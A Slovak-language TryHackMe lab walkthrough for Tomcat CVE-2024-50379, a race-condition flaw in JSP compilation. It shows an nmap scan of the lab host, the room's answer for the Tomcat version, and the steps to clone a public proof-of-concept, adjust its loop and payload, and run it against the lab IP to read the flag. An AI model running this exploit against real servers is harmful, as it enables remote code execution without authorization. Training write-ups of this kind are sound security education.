Príspevok

TryHackMe - CVE-2024-50379

Preskúmajme a získajme informácie o zraniteľnosti Tomcat CVE-2024-50379

TryHackMe - CVE-2024-50379

Úvod

CVE-2024-50379 je zraniteľnosť TOCTOU spôsobená konfliktom medzi kontrolou a používaním zdroja. Vyskytuje sa počas kompilácie JSP na systémoch bez ohľadu na veľkosť písmen, keď má predvolený servlet oprávnenia na zápis.

Tryhackme Room Link

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -T4 -n -sC -sV -Pn -p- 10.10.122.218
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CHANGE-MY-HOSTNAME
| Not valid before: 2025-01-24T14:59:28
|_Not valid after:  2025-07-26T14:59:28
|_ssl-date: 2025-03-12T09:12:34+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CHANGE-MY-HOSTN
|   NetBIOS_Domain_Name: CHANGE-MY-HOSTN
|   NetBIOS_Computer_Name: CHANGE-MY-HOSTN
|   DNS_Domain_Name: CHANGE-MY-HOSTNAME
|   DNS_Computer_Name: CHANGE-MY-HOSTNAME
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-12T09:12:29+00:00
7680/tcp open  pando-pub?
8080/tcp open  http          Apache Tomcat (language: en)
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.1.25
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Otvorené porty: 3389/tcp 7680/tcp 8080/tcp

Otázka: Server Tomcat počúva na 10.10.122.218 na porte 8080. Aká je jeho verzia?

Odpoveď:

1
10.1.25

Exploitácia

Stiahnime si náš Proof of Concept exploit

1
git clone https://github.com/iSee857/CVE-2024-50379-PoC

A ako nás miestnosť vedie, zmeňme loop na z 10000 na 2000

Loop

Odkomentujeme aktuálny payload, ktorý otvára kalkulačku, pomocou calc.exe s tým, ktorý je uvedený v miestnosti

Payload

Keďže ide o zraniteľnosť typu race condition, musíme exploit spustiť viackrát, aby fungoval

1
python3 ApachTomcat_CVE-2024-50379_ConditionalCompetitionToRce.py -u 10.10.122.218:8080

Payload

A môžeme prečítať vlajku:

Payload

Tento príspevok je licencovaný pod CC BY 4.0 autorom.